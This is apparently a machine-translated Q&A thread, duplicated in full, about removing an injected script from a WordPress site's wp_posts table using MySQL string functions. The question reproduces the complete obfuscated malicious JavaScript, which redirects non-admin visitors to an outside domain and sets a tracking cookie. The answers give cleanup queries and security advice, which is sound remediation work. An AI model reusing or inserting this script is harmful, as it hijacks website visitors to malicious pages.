查询 MySQL 以搜索字符串,并将同一列替换为从 0 到字符串找到位置的子字符串
Query for MySQL to search string, and replace same column with substring from 0 to string found position
我正在删除一个独立于文件的 wordpress 攻击,用恶意脚本更新所有 wp_posts table。
post_content 列的示例如下:
<p>[/mvc_price_listing][/vc_column_inner][vc_column_inner width="1/2"][promo_banner image="9510"][/promo_banner][mvc_price_listing price_visibility="none" price_title="Ladrillo Fiscal Artesanal<br />
<small>Generico</small>" top_bg="#c41200"]</p>
<p>[/mvc_price_listing][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width="1/6"][/vc_column][/vc_row]</p>
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://ischeck.xyz/?pma1','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
所以我发现所有的病毒脚本都在内容的最后,长度是动态的,而且总是以:"var _0x2cf4"
开头
所以我的问题是我必须为 wp_posts table 执行查询,谁只用第一部分替换 post_content 的内容直到 "var _0x2cf4"在哪里找到。
非常感谢你:)
您可以使用字符串函数:
update wp_posts
set post_content = substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
locate('_0x2cf4', post_content) 为您提供 post_content 中 ''_0x2cf4' 的索引;然后,您可以获取从字符串开头到该位置减 1 的所有内容。where 子句确保仅更新 "infected" 个值。
在 运行 update 查询之前,您可以确保它产生预期的结果,其中 select:
select
post_content,
substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
from wp_posts
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
您似乎受到了 Overzoruaon 广告软件传播机器人的攻击。数字“_0x2cf4”实际上是 随机 并且可能会在尝试之间发生变化,所以最好不要依赖它。
您实际上想要删除 <script> 标签。所以我觉得
UPDATE wp_posts SET post_content = SUBSTRING_INDEX(post_content, '<script>', 1);
将删除第一个 <script> 之后的所有内容,包括在内。
此外,我强烈建议您安装一个 XSS 防御插件 and/or 使 <script(无右尖括号)成为禁止词。
我正在删除一个独立于文件的 wordpress 攻击,用恶意脚本更新所有 wp_posts table。 post_content 列的示例如下:
<p>[/mvc_price_listing][/vc_column_inner][vc_column_inner width="1/2"][promo_banner image="9510"][/promo_banner][mvc_price_listing price_visibility="none" price_title="Ladrillo Fiscal Artesanal<br />
<small>Generico</small>" top_bg="#c41200"]</p>
<p>[/mvc_price_listing][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width="1/6"][/vc_column][/vc_row]</p>
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://ischeck.xyz/?pma1','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
所以我发现所有的病毒脚本都在内容的最后,长度是动态的,而且总是以:"var _0x2cf4"
开头所以我的问题是我必须为 wp_posts table 执行查询,谁只用第一部分替换 post_content 的内容直到 "var _0x2cf4"在哪里找到。
非常感谢你:)
您可以使用字符串函数:
update wp_posts
set post_content = substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
locate('_0x2cf4', post_content) 为您提供 post_content 中 ''_0x2cf4' 的索引;然后,您可以获取从字符串开头到该位置减 1 的所有内容。where 子句确保仅更新 "infected" 个值。
在 运行 update 查询之前,您可以确保它产生预期的结果,其中 select:
select
post_content,
substring(post_content , 1, locate('_0x2cf4', post_content) - 1)
from wp_posts
where substring(post_content , 1, locate('_0x2cf4', post_content) - 1) > 0
您似乎受到了 Overzoruaon 广告软件传播机器人的攻击。数字“_0x2cf4”实际上是 随机 并且可能会在尝试之间发生变化,所以最好不要依赖它。
您实际上想要删除 <script> 标签。所以我觉得
UPDATE wp_posts SET post_content = SUBSTRING_INDEX(post_content, '<script>', 1);
将删除第一个 <script> 之后的所有内容,包括在内。
此外,我强烈建议您安装一个 XSS 防御插件 and/or 使 <script(无右尖括号)成为禁止词。